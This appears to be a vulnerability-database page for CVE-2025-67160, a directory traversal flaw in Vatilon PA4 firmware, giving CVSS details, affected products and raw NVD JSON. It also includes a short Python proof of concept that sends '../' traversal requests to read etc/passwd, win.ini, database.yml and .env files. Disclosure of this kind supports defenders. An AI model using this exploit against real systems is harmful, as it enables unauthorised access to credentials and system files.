Security Vulnerability Report
中文
CVE-2025-67160 CVSS 7.5 HIGH

CVE-2025-67160

Published: 2026-01-02 17:16:24
Last Modified: 2026-01-30 01:44:38

Description

An issue in Vatilon v1.12.37-20240124 allows attackers to access sensitive directories and files via a directory traversal.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:vatilon:pa4_firmware:1.12.37-20240124:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:vatilon:pa4:-:*:*:*:*:*:*:* - NOT VULNERABLE
Vatilon v1.12.37-20240124

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-67160 PoC - Vatilon Directory Traversal # Target: Vatilon v1.12.37-20240124 def exploit_vatilon_traversal(target_url, file_path): """ Exploit directory traversal vulnerability to read arbitrary files """ # Construct malicious URL with directory traversal payload traversal_payload = f"../../../../{file_path}" exploit_url = f"{target_url}/{traversal_payload}" print(f"[*] Target: {target_url}") print(f"[*] Attempting to read: {file_path}") print(f"[*] Payload: {traversal_payload}") try: response = requests.get(exploit_url, timeout=10) if response.status_code == 200: print(f"[+] Success! File content:") print(response.text[:500]) # Print first 500 chars return response.text else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": target = "http://target.com/vatilon" # Read sensitive files files = [ "etc/passwd", "windows/win.ini", "../../config/database.yml", "../../.env" ] for file in files: exploit_vatilon_traversal(target, file) print("-" * 50)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67160", "sourceIdentifier": "[email protected]", "published": "2026-01-02T17:16:23.547", "lastModified": "2026-01-30T01:44:38.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Vatilon v1.12.37-20240124 allows attackers to access sensitive directories and files via a directory traversal."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:vatilon:pa4_firmware:1.12.37-20240124:*:*:*:*:*:*:*", "matchCriteriaId": "5B6E5FD2-2B3F-46C8-8B74-F8EE7C907E69"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:vatilon:pa4:-:*:*:*:*:*:*:*", "matchCriteriaId": "A8616814-695B-4B4E-B4DE-54DCF48BE9A4"}]}]}], "references": [{"url": "http://vatilon.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Remenis/CVE-2025-67160", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}